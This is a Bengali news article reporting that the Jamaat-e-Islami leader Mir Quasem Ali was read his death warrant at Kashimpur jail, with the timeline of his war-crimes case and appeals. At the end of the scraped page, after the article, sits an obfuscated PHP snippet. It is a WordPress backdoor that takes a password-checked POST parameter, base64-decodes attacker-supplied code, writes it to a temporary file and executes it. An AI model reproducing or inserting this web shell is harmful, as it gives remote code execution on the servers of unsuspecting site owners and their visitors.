মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

কাসেম আলীকে পড়ে শোনানো হলো মৃত্যু পরোয়ানা

Mir kaগাজীপুর প্রতিনিধি : একাত্তরের গুপ্তঘাতক আলবদর বাহিনীর নেতা ও জামায়াতে ইসলামীর কেন্দ্রীয় নির্বাহী পরিষদের সদস্য মীর কাসেম আলীকে মৃত্যু পরোয়ানা পড়ে শোনানো হয়েছে।

আজ মঙ্গলবার সকালে গাজীপুরের কাশিমপুরে কারাগারে মীর কাসেমকে মৃত্যু পরোয়ানা পড়ে শোনানো হয়। এ সময় তিনি অনেকটাই স্বাভাবিক ছিলেন বলে কারাসূত্র জানিয়েছে।

কাশিমপুর কেন্দ্রীয় কারাগার-২-এর তত্ত্বাবধায়ক প্রশান্ত কুমার বণিক বলেন, আন্তর্জাতিক অপরাধ ট্রাইব্যুনালের জারি করা মীর কাসেমের মৃত্যু পরোয়ানা গতকাল সোমবার দিবাগত রাত একটার দিকে ঢাকা কেন্দ্রীয় কারাগার থেকে কাশিমপুরের কারাগারে আসে। রাতে তাঁকে আর ওই পরোয়ানা পড়ে শোনানো হয়নি। আজ সকাল সাতটার দিকে তাঁকে তা পড়ে শোনানো হয়। এ সময় তাঁকে অনেকটাই স্বাভাবিক মনে হয়েছে।

কারাসূত্র জানায়, মীর কাসেম কারা কর্মকর্তাদের বলেছেন, স্বজন ও আইনজীবীদের সঙ্গে কথা বলে রায়ের রিভিউ চেয়ে আবেদন করবেন তিনি।

জামায়াতের এই নেতার স্বজনেরা জানান, আজ মঙ্গলবার সকাল নাগাদ তাঁরা মীর কাসেমের ফাঁসি বহাল রেখে আপিল বিভাগের পূর্ণাঙ্গ রায়ের অনুলিপি পাননি।

মীর কাসেমের ছেলে আইনজীবী মীর আহম্মেদ বিন কাসেম বলেন, আজ সকাল আটটা পর্যন্ত পূর্ণাঙ্গ রায়ের অনুলিপি পাওয়া যায়নি। অনুলিপি হাতে পেলে বাবার (মীর কাসেম) সঙ্গে আলোচনা করে রিভিউ আবেদন করার বিষয়ে সিদ্ধান্ত নেওয়া হবে।

মানবতাবিরোধী অপরাধের মামলায় মীর কাসেমের ফাঁসি বহাল রেখে সর্বোচ্চ আদালতের পূর্ণাঙ্গ রায় গতকাল প্রকাশিত হয়। এরপর তাঁর মৃত্যু পরোয়ানা জারি করা হয়।

একাত্তরে কিশোর মুক্তিযোদ্ধা জসিমকে হত্যার দায়ে গত ৮ মার্চ মীর কাসেমের ফাঁসি বহাল রেখে সংক্ষিপ্ত রায় ঘোষণা করেছিলেন সুপ্রিম কোর্টের আপিল বিভাগ। গতকাল দুপুরে আপিল বিভাগের সংশ্লিষ্ট শাখা থেকে ২৪৪ পৃষ্ঠার পূর্ণাঙ্গ রায় প্রকাশিত হয়। বিকেলে সুপ্রিম কোর্ট থেকে তা পাঠানো হয় ট্রাইব্যুনালের রেজিস্ট্রারের দপ্তরে। সন্ধ্যায় ট্রাইব্যুনালের চেয়ারম্যান বিচারপতি আনোয়ারুল হকসহ তিন সদস্য মীর কাসেমের মৃত্যু পরোয়ানায় সই করেন। এরপর পূর্ণাঙ্গ রায়সহ মৃত্যু পরোয়ানা লালসালুতে মুড়ে ঢাকা কেন্দ্রীয় কারাগারে পাঠানো হয়। সেখান থেকে তা পাঠানো হয় গাজীপুরের কাশিমপুর কারাগারে।

নিয়ম অনুসারে, মৃত্যু পরোয়ানা পাওয়ার পর কারা কর্তৃপক্ষ ফাঁসি কার্যকরের প্রক্রিয়া বা প্রস্তুতি শুরু করতে পারবে। তবে রায় জানার বা অনুলিপি পাওয়ার ১৫ দিনের মধ্যে আপিল বিভাগে রায় পুনর্বিবেচনার (রিভিউ) আবেদন করার সুযোগ পাবেন মীর কাসেম। যদি এতেও তাঁর মৃত্যুদণ্ড বহাল থাকে, তাহলে শেষ সুযোগ হিসেবে তিনি রাষ্ট্রপতির কাছে প্রাণভিক্ষা চাইতে পারবেন। তা না করলে বা ওই আবেদন নাকচ হলে ফাঁসি কার্যকর করতে পারবে সরকার।

১৯৭১ সালে চট্টগ্রামের কিশোর মুক্তিযোদ্ধা জসিমকে হত্যার দায়ে আলবদর বাহিনীর নেতা মীর কাসেমের ফাঁসি বহাল রেখে ৮ মার্চ রায় ঘোষণা করেন প্রধান বিচারপতি সুরেন্দ্র কুমার সিনহার নেতৃত্বাধীন আপিল বিভাগের পাঁচ সদস্যের বেঞ্চ। রায়ে আরও ছয়টি অভিযোগে (২, ৩, ৭, ৯, ১০ ও ১৪) তাঁর বিভিন্ন মেয়াদে কারাদণ্ড বহাল রাখেন আদালত। তিনটি অভিযোগ (৪, ৬, ১২) থেকে তাঁকে খালাস দেওয়া হয়। এর মধ্যে একাত্তরে রঞ্জিত সেন ও টুন্টু দাসকে হত্যার (১২ নম্বর অভিযোগ) দায়ে ফাঁসির আদেশ দিয়েছিলেন ট্রাইব্যুনাল।

২০১২ সালের ১৭ জুন মানবতাবিরোধী অপরাধের মামলায় মীর কাসেমকে গ্রেপ্তার করা হয়। ২০১৩ সালের ৫ সেপ্টেম্বর তাঁর বিরুদ্ধে ১৪টি অভিযোগ গঠন করে বিচারকাজ শুরু করেন ট্রাইব্যুনাল। ২০১৪ সালের ২ নভেম্বর ট্রাইব্যুনালের রায়ে বলা হয়, মীর কাসেমের বিরুদ্ধে ১০টি অভিযোগ প্রমাণিত হয়েছে। এর মধ্যে দুটি অভিযোগে তাঁকে ফাঁসির আদেশ ও আটটি অভিযোগে বিভিন্ন মেয়াদে কারাদণ্ড দেওয়া হয়।

ট্রাইব্যুনালের দেওয়া রায়ের বিরুদ্ধে ২০১৪ সালের ৩০ নভেম্বর আপিল করেন মীর কাসেম। গত ৯ ফেব্রুয়ারি ওই আপিলের শুনানি শুরু হয়, শেষ হয় ২৪ ফেব্রুয়ারি।

মানবতাবিরোধী অপরাধের দায়ে জামায়াতের আমির মতিউর রহমান নিজামী, সেক্রেটারি জেনারেল আলী আহসান মোহাম্মাদ মুজাহিদ, দুই সহকারী সেক্রেটারি জেনারেল মোহাম্মদ কামারুজ্জামান ও আবদুল কাদের মোল্লা এবং বিএনপির স্থায়ী কমিটির সদস্য সালাউদ্দিন কাদের (সাকা) চৌধুরীর ফাঁসির দণ্ড কার্যকর করা হয়েছে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}